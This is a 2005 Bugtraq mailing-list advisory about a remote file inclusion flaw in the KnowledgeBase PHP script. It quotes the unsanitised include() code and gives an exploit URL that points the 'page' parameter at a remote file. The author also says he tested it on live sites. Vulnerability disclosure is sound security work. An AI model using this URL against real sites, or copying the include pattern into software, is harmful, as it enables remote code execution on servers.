[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    KnowledgeBase
From:       Francisco Alisson <dominusvis () click21 ! com ! br>
Date:       2005-03-12 12:15:47
Message-ID: 20050312121547.31019.qmail () www ! securityfocus ! com
[Download RAW message or body]



Remote File Inclusion

KnowledgeBase
Vendor: www.activecampaign.com/kb/

Well, inside the index.php file we can see:

if ($page == ""){
 $page = "startup";
}
 @include("$page.php");
?>

After I tested some sites with kb I got file inclusion:
http://www.site.com/kb/index.php?page=http://[file]

Dominus_Vis
[Infektion Group]
[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic